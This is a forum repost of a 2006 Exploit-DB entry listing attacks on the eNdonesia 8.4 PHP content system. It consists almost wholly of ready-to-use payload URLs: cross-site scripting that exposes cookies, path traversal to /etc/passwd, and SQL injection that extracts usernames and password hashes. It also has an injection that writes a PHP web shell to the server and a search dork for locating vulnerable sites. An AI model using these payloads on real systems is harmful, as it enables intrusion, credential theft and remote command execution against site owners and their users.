Exploit eNdonesia 8.4 - '/mod.php/friend.php/admin.php' Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3004
Проверка EDB
  1. Пройдено
Автор
Z1CKX(RU)
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6873 cve-2006-6872 cve-2006-6871
Дата публикации
2006-12-25
Код:
bugs for Endonesia8.4 
FInd:z1ckX(ru)
mail:[email protected]
1) http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
2) http://localhost/en/friend.php your Friend:[XSS]
3) http://localhost/en/admin.php Main Text: [XSS]
4) http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)</script>
5) http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
6) http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
7) http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
8) http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*

-=====SHELL====-
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '/home/localhost/www/en/cmd.php'/*

-======dork=====-
inurl:mod.php?mod=diskusi&op=   

# milw0rm.com [2006-12-25]
 
Источник
www.exploit-db.com

Похожие темы